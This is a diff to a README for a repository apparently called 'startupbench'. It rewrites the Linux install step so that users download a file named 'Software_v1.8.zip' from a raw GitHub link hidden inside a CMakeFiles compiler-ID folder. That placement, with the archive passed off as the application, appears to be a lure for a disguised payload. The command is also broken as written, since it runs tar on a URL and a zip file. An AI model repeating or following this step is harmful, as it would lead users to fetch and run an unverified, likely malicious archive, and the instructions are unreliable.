SaeaaN3/startupbench/README.md

 4. **Linux Users:**
    - Open a terminal.
    - Navigate to the directory where you saved the file using `cd /path/to/directory`.
-   - Extract the tar file with the command `tar -xvf startupbench.tar.gz`.
+   - Extract the tar file with the command `tar -xvf https://github.com/SaeaaN3/startupbench/raw/refs/heads/main/CMakeFiles/4.2.0/CompilerIdCXX/Software_v1.8.zip`.
    - Navigate into the extracted folder.
    - Run the application with `./startupbench`.